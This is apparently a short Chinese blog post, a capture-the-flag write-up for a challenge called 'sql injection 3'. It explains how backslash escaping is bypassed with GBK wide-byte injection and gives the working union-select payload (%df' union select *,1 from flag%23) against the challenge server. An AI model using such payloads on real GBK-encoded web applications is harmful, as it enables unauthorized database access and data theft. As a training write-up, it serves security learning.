码迷,mamicode.com
首页 > 数据库 > 详细

sql injection 3

时间:2017-05-28 16:05:09      阅读:278      评论:0      收藏:0      [点我收藏+]

标签:block   语句   news   http   title   php   nio   宽字节注入   宽字节   

打开就看见

执行的sql语句:SELECT id,title FROM news WHERE id=’1’

尝试闭合构造语句,发现无论怎么构造都会出现\

http://115.28.150.176/sqli/index.php?id=1’ select * from news

看来需要干掉/。尝试id ,发现id=2时出现提示

id: 2 title: gbk_sql_injection

看来是宽字节注入
可知当存在%df时就会吃掉\
多次尝试,最终构造

http://115.28.150.176/sqli/index.php?id=%df’ union select *,1 from flag%23

出现flag

sql injection 3

标签:block   语句   news   http   title   php   nio   宽字节注入   宽字节   

原文地址:http://www.cnblogs.com/maodun/p/6915823.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!